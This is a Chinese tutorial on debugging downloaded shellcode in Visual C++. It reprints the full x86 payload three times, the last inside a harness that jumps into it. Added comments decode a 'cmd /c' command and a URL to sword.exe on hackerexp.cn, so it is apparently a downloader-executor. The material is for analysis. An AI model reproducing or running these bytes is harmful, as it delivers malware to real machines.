用VC 调试 Shellcode 方法

           

经常会在网上看到公布出来的shellcode,都是二进制的文件,可以把这个二进制文件通过反汇编工具反汇编出汇编代码,不过也可以通过VC来调试shellcode。

比如在网上看到了这样的shellcode     

 

8B EC 64 8B 15 30 00 00 00 8D 52 03 80 3A 01 0F 84 C8 00 00 00 C6 02 01 E8 4B 01 00 00 68 00 03 00 00 6A 00 FF D0 B9 00 03 00 00 8B F8 EB 05 5E F3 A4 FF D0 E8 F6 FF FF FF EB 17 57 E8 8B 01 00 00 8B F8 33 C9 49 33 C0 B0 C3 FC F2 AE 8D 47 FF 5F C3 E9 F5 01 00 00 5B 81 EC 14 01 00 00 8B D4 3E C7 02 63 6D 64 20 3E C7 42 04 2F 63 20 22 83 C2 08 33 C0 50 50 68 04 01 00 00 52 53 50 E8 21 01 00 00 FF D0 8B FC 8B C7 83 C0 08 3E 8A 18 84 DB 74 03 40 EB F6 3E C6 00 22 33 D2 3E 88 50 01 83 EC 54 33 C0 33 DB 8B CC 83 F8 54 7D 09 3E 89 1C 01 83 C0 04 EB F2 8B CC 8B D9 83 C3 10 33 C0 3E C7 43 2C 01 00 00 00 51 53 50 50 50 50 50 50 57 50 E8 B9 00 00 00 E8 04 00 00 00 90 6A 00 C3 80 38 55 74 0F 81 78 05 90 90 90 90 74 06 55 8B EC 8D 40 05 FF E0 68 6F 6E 00 00 68 75 72 4C 6D EB 12 8D 44 24 04 50 E8 2F FF FF FF 50 E8 A6 00 00 00 EB CC E8 E9 FF FF FF 83 C4 08 C3 6A 6C 68 6E 74 64 6C EB 12 8D 44 24 04 50 E8 0B FF FF FF 50 E8 82 00 00 00 EB A8 E8 E9 FF FF FF 83 C4 08 C3 68 33 32 32 32 68 75 73 65 72 EB 12 8D 44 24 04 50 E8 E4 FE FF FF 50 E8 5B 00 00 00 EB 81 E8 E9 FF FF FF 83 C4 08 C3 E8 5F 00 00 00 68 EC 97 03 0C 50 E8 7A 00 00 00 83 C4 08 C3 E8 4B 00 00 00 68 AA FC 0D 7C 50 E8 66 00 00 00 83 C4 08 C3 E8 37 00 00 00 68 72 FE B3 16 50 E8 52 00 00 00 83 C4 08 C3 E8 4D FF FF FF 68 4F EF 4F 05 50 E8 3E 00 00 00 83 C4 08 C3 E8 0F 00 00 00 68 8E 4E 0E EC 50 E8 2A 00 00 00 83 C4 08 C3 33 C0 64 8B 40 30 85 C0 78 10 3E 8B 40 0C 3E 8B 70 1C AD 3E 8B 40 08 C3 EB 0B 3E 8B 40 34 83 C0 7C 3E 8B 40 3C C3 60 36 8B 6C 24 24 36 8B 45 3C 36 8B 54 05 78 03 D5 3E 8B 4A 18 3E 8B 5A 20 03 DD E3 3A 49 3E 8B 34 8B 03 F5 33 FF 33 C0 FC AC 84 C0 74 07 C1 CF 0D 03 F8 EB F4 36 3B 7C 24 28 75 DF 3E 8B 5A 24 03 DD 66 3E 8B 0C 4B 3E 8B 5A 1C 03 DD 3E 8B 04 8B 03 C5 36 89 44 24 1C 61 C3 E8 06 FE FF FF 68 54 54 70 3A 2F 2F 77 77 77 2E 68 61 63 6B 65 72 65 78 70 2E 63 6E 2F 73 77 6F 72 64 2E 65 78 65 00                

 

把二进制的文件保存到文件中,通过VC 2005的正则表达式替换功能,替换成为:

 

0x8B, 0xEC, 0x64, 0x8B, 0x15, 0x30, 0x00, 0x00, 0x00, 0x8D, 0x52, 0x03, 0x80, 0x3A, 0x01, 0x0F, 0x84, 0xC8, 0x00, 0x00, 0x00, 0xC6, 0x02, 0x01, 0xE8, 0x4B, 0x01, 0x00, 0x00, 0x68, 0x00, 0x03, 0x00, 0x00, 0x6A, 0x00, 0xFF, 0xD0, 0xB9, 0x00, 0x03, 0x00, 0x00, 0x8B, 0xF8, 0xEB, 0x05, 0x5E, 0xF3, 0xA4, 0xFF, 0xD0, 0xE8, 0xF6, 0xFF, 0xFF, 0xFF, 0xEB, 0x17, 0x57, 0xE8, 0x8B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x33, 0xC9, 0x49, 0x33, 0xC0, 0xB0, 0xC3, 0xFC, 0xF2, 0xAE, 0x8D, 0x47, 0xFF, 0x5F, 0xC3, 0xE9, 0xF5, 0x01, 0x00, 0x00, 0x5B, 0x81, 0xEC, 0x14, 0x01, 0x00, 0x00, 0x8B, 0xD4, 0x3E, 0xC7, 0x02, 0x63, 0x6D, 0x64, 0x20, 0x3E, 0xC7, 0x42, 0x04, 0x2F, 0x63, 0x20, 0x22, 0x83, 0xC2, 0x08, 0x33, 0xC0, 0x50, 0x50, 0x68, 0x04, 0x01, 0x00, 0x00, 0x52, 0x53, 0x50, 0xE8, 0x21, 0x01, 0x00, 0x00, 0xFF, 0xD0, 0x8B, 0xFC, 0x8B, 0xC7, 0x83, 0xC0, 0x08, 0x3E, 0x8A, 0x18, 0x84, 0xDB, 0x74, 0x03, 0x40, 0xEB, 0xF6, 0x3E, 0xC6, 0x00, 0x22, 0x33, 0xD2, 0x3E, 0x88, 0x50, 0x01, 0x83, 0xEC, 0x54, 0x33, 0xC0, 0x33, 0xDB, 0x8B, 0xCC, 0x83, 0xF8, 0x54, 0x7D, 0x09, 0x3E, 0x89, 0x1C, 0x01, 0x83, 0xC0, 0x04, 0xEB, 0xF2, 0x8B, 0xCC, 0x8B, 0xD9, 0x83, 0xC3, 0x10, 0x33, 0xC0, 0x3E, 0xC7, 0x43, 0x2C, 0x01, 0x00, 0x00, 0x00, 0x51, 0x53, 0x50, 0x50, 0x50, 0x50, 0x50, 0x50, 0x57, 0x50, 0xE8, 0xB9, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x90, 0x6A, 0x00, 0xC3, 0x80, 0x38, 0x55, 0x74, 0x0F, 0x81, 0x78, 0x05, 0x90, 0x90, 0x90, 0x90, 0x74, 0x06, 0x55, 0x8B, 0xEC, 0x8D, 0x40, 0x05, 0xFF, 0xE0, 0x68, 0x6F, 0x6E, 0x00, 0x00, 0x68, 0x75, 0x72, 0x4C, 0x6D, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x2F, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0xA6, 0x00, 0x00, 0x00, 0xEB, 0xCC, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x6A, 0x6C, 0x68, 0x6E, 0x74, 0x64, 0x6C, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x0B, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0x82, 0x00, 0x00, 0x00, 0xEB, 0xA8, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x68, 0x33, 0x32, 0x32, 0x32, 0x68, 0x75, 0x73, 0x65, 0x72, 0xEB, 0x12, 
0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8, 0x5B, 0x00, 0x00, 0x00, 0xEB, 0x81, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x5F, 0x00, 0x00, 0x00, 0x68, 0xEC, 0x97, 0x03, 0x0C, 0x50, 0xE8, 0x7A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4B, 0x00, 0x00, 0x00, 0x68, 0xAA, 0xFC, 0x0D, 0x7C, 0x50, 0xE8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x37, 0x00, 0x00, 0x00, 0x68, 0x72, 0xFE, 0xB3, 0x16, 0x50, 0xE8, 0x52, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4D, 0xFF, 0xFF, 0xFF, 0x68, 0x4F, 0xEF, 0x4F, 0x05, 0x50, 0xE8, 0x3E, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x0F, 0x00, 0x00, 0x00, 0x68, 0x8E, 0x4E, 0x0E, 0xEC, 0x50, 0xE8, 0x2A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0x33, 0xC0, 0x64, 0x8B, 0x40, 0x30, 0x85, 0xC0, 0x78, 0x10, 0x3E, 0x8B, 0x40, 0x0C, 0x3E, 0x8B, 0x70, 0x1C, 0xAD, 0x3E, 0x8B, 0x40, 0x08, 0xC3, 0xEB, 0x0B, 0x3E, 0x8B, 0x40, 0x34, 0x83, 0xC0, 0x7C, 0x3E, 0x8B, 0x40, 0x3C, 0xC3, 0x60, 0x36, 0x8B, 0x6C, 0x24, 0x24, 0x36, 0x8B, 0x45, 0x3C, 0x36, 0x8B, 0x54, 0x05, 0x78, 0x03, 0xD5, 0x3E, 0x8B, 0x4A, 0x18, 0x3E, 0x8B, 0x5A, 0x20, 0x03, 0xDD, 0xE3, 0x3A, 0x49, 0x3E, 0x8B, 0x34, 0x8B, 0x03, 0xF5, 0x33, 0xFF, 0x33, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x07, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0xEB, 0xF4, 0x36, 0x3B, 0x7C, 0x24, 0x28, 0x75, 0xDF, 0x3E, 0x8B, 0x5A, 0x24, 0x03, 0xDD, 0x66, 0x3E, 0x8B, 0x0C, 0x4B, 0x3E, 0x8B, 0x5A, 0x1C, 0x03, 0xDD, 0x3E, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0x36, 0x89, 0x44, 0x24, 0x1C, 0x61, 0xC3, 0xE8, 0x06, 0xFE, 0xFF, 0xFF, 0x68, 0x54, 0x54, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x68, 0x61, 0x63, 0x6B, 0x65, 0x72, 0x65, 0x78, 0x70, 0x2E, 0x63, 0x6E, 0x2F, 0x73, 0x77, 0x6F, 0x72, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00,                        

 

所用的替换规则如下:Find What : {[0-9a-fA-F][0-9a-fA-F]}  , Replace with : 0x/1,                      

之后在VC 中创建一个基于console 的项目,例如:

 

/* Raw shellcode bytes pasted in as an ordinary global array. The compiler
 * treats this as opaque data; it only becomes code because _tmain jumps into
 * it. Nothing validates the array's length, so any byte miscopied during the
 * hex-to-literal conversion silently changes what executes.
 *
 * Readable fragments inside the blob say what it embeds, which is the useful
 * thing to pull out of it before stepping through it:
 *   - 0x63 0x6D 0x64 0x20 / 0x2F 0x63 0x20 0x22 are stored as two dwords and
 *     spell "cmd /c \"".
 *   - the trailing bytes after 0xE8 0x06 0xFE 0xFF 0xFF spell
 *     "hTTp://www.hackerexp.cn/sword.exe" followed by the 0x00 terminator --
 *     a URL to an .exe, which is the indicator worth recording; keep the final
 *     0x00, it ends that string.
 *   - the byte loop containing 0xC1 0xCF 0x0D / 0x03 0xF8 (ror edi,13 ; add
 *     edi,eax) looks like a name-hash routine, so the 4-byte constants pushed
 *     just before the nearby calls are presumably API-name hashes -- confirm
 *     in the disassembly rather than trusting this note. */
unsigned char pdata[] = { 0x8B, 0xEC, 0x64, 0x8B, 0x15, 0x30, 0x00, 0x00, 0x00, 0x8D, 0x52, 0x03, 0x80, 0x3A, 0x01, 0x0F, 0x84, 0xC8, 0x00, 0x00, 0x00, 0xC6, 0x02, 0x01, 0xE8, 0x4B, 0x01, 0x00, 0x00, 0x68, 0x00, 0x03, 0x00, 0x00, 0x6A, 0x00, 0xFF, 0xD0, 0xB9, 0x00, 0x03, 0x00, 0x00, 0x8B, 0xF8, 0xEB, 0x05, 0x5E, 0xF3, 0xA4, 0xFF, 0xD0, 0xE8, 0xF6, 0xFF, 0xFF, 0xFF, 0xEB, 0x17, 0x57, 0xE8, 0x8B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x33, 0xC9, 0x49, 0x33, 0xC0, 0xB0, 0xC3, 0xFC, 0xF2, 0xAE, 0x8D, 0x47, 0xFF, 0x5F, 0xC3, 0xE9, 0xF5, 0x01, 0x00, 0x00, 0x5B, 0x81, 0xEC, 0x14, 0x01, 0x00, 0x00, 0x8B, 0xD4, 0x3E, 0xC7, 0x02, 0x63, 0x6D, 0x64, 0x20, 0x3E, 0xC7, 0x42, 0x04, 0x2F, 0x63, 0x20, 0x22, 0x83, 0xC2, 0x08, 0x33, 0xC0, 0x50, 0x50, 0x68, 0x04, 0x01, 0x00, 0x00, 0x52, 0x53, 0x50, 0xE8, 0x21, 0x01, 0x00, 0x00, 0xFF, 0xD0, 0x8B, 0xFC, 0x8B, 0xC7, 0x83, 0xC0, 0x08, 0x3E, 0x8A, 0x18, 0x84, 0xDB, 0x74, 0x03, 0x40, 0xEB, 0xF6, 0x3E, 0xC6, 0x00, 0x22, 0x33, 0xD2, 0x3E, 0x88, 0x50, 0x01, 0x83, 0xEC, 0x54, 0x33, 0xC0, 0x33, 0xDB, 0x8B, 0xCC, 0x83, 0xF8, 0x54, 0x7D, 0x09, 0x3E, 0x89, 0x1C, 0x01, 0x83, 0xC0, 0x04, 0xEB, 0xF2, 0x8B, 0xCC, 0x8B, 0xD9, 0x83, 0xC3, 0x10, 0x33, 0xC0, 0x3E, 0xC7, 0x43, 0x2C, 0x01, 0x00, 0x00, 0x00, 0x51, 0x53, 0x50, 0x50, 0x50, 0x50, 0x50, 0x50, 0x57, 0x50, 0xE8, 0xB9, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x90, 0x6A, 0x00, 0xC3, 0x80, 0x38, 0x55, 0x74, 0x0F, 0x81, 0x78, 0x05, 0x90, 0x90, 0x90, 0x90, 0x74, 0x06, 0x55, 0x8B, 0xEC, 0x8D, 0x40, 0x05, 0xFF, 0xE0, 0x68, 0x6F, 0x6E, 0x00, 0x00, 0x68, 0x75, 0x72, 0x4C, 0x6D, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x2F, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0xA6, 0x00, 0x00, 0x00, 0xEB, 0xCC, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x6A, 0x6C, 0x68, 0x6E, 0x74, 0x64, 0x6C, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x0B, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0x82, 0x00, 0x00, 0x00, 0xEB, 0xA8, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x68, 0x33, 0x32, 0x32, 0x32, 0x68, 0x75, 0x73, 
0x65, 0x72, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8, 0x5B, 0x00, 0x00, 0x00, 0xEB, 0x81, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x5F, 0x00, 0x00, 0x00, 0x68, 0xEC, 0x97, 0x03, 0x0C, 0x50, 0xE8, 0x7A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4B, 0x00, 0x00, 0x00, 0x68, 0xAA, 0xFC, 0x0D, 0x7C, 0x50, 0xE8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x37, 0x00, 0x00, 0x00, 0x68, 0x72, 0xFE, 0xB3, 0x16, 0x50, 0xE8, 0x52, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4D, 0xFF, 0xFF, 0xFF, 0x68, 0x4F, 0xEF, 0x4F, 0x05, 0x50, 0xE8, 0x3E, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x0F, 0x00, 0x00, 0x00, 0x68, 0x8E, 0x4E, 0x0E, 0xEC, 0x50, 0xE8, 0x2A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0x33, 0xC0, 0x64, 0x8B, 0x40, 0x30, 0x85, 0xC0, 0x78, 0x10, 0x3E, 0x8B, 0x40, 0x0C, 0x3E, 0x8B, 0x70, 0x1C, 0xAD, 0x3E, 0x8B, 0x40, 0x08, 0xC3, 0xEB, 0x0B, 0x3E, 0x8B, 0x40, 0x34, 0x83, 0xC0, 0x7C, 0x3E, 0x8B, 0x40, 0x3C, 0xC3, 0x60, 0x36, 0x8B, 0x6C, 0x24, 0x24, 0x36, 0x8B, 0x45, 0x3C, 0x36, 0x8B, 0x54, 0x05, 0x78, 0x03, 0xD5, 0x3E, 0x8B, 0x4A, 0x18, 0x3E, 0x8B, 0x5A, 0x20, 0x03, 0xDD, 0xE3, 0x3A, 0x49, 0x3E, 0x8B, 0x34, 0x8B, 0x03, 0xF5, 0x33, 0xFF, 0x33, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x07, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0xEB, 0xF4, 0x36, 0x3B, 0x7C, 0x24, 0x28, 0x75, 0xDF, 0x3E, 0x8B, 0x5A, 0x24, 0x03, 0xDD, 0x66, 0x3E, 0x8B, 0x0C, 0x4B, 0x3E, 0x8B, 0x5A, 0x1C, 0x03, 0xDD, 0x3E, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0x36, 0x89, 0x44, 0x24, 0x1C, 0x61, 0xC3, 0xE8, 0x06, 0xFE, 0xFF, 0xFF, 0x68, 0x54, 0x54, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x68, 0x61, 0x63, 0x6B, 0x65, 0x72, 0x65, 0x78, 0x70, 0x2E, 0x63, 0x6E, 0x2F, 0x73, 0x77, 0x6F, 0x72, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00 };

/* Entry point of the harness: transfers control straight into pdata so the
 * bytes can be stepped through in the IDE as if they were a function.
 * argc/argv are not used. _tmain and _TCHAR presume <tchar.h>, which this
 * listing does not show.
 *
 * NOTE(review): pdata is an ordinary initialized global, i.e. it sits in a
 * writable data section that a DEP-enabled process does not treat as
 * executable -- confirm the build and OS settings, otherwise the jmp below
 * faults here instead of reaching the first shellcode byte. */
int _tmain(int argc,_TCHAR* argv[])

{

          __asm

              {

                       mov eax, offset pdata   ; eax = address of pdata[0]; nothing checks the array or its length

                     jmp eax   ; control leaves this frame here and only comes back if the shellcode itself returns

           }

         /* Reached only if the bytes in pdata return to this frame with the
          * stack intact; from this listing alone that cannot be assumed. */
         return 0;

}

 

这样就可以在VC IDE 环境下调试这个shellcode,感觉很方便。
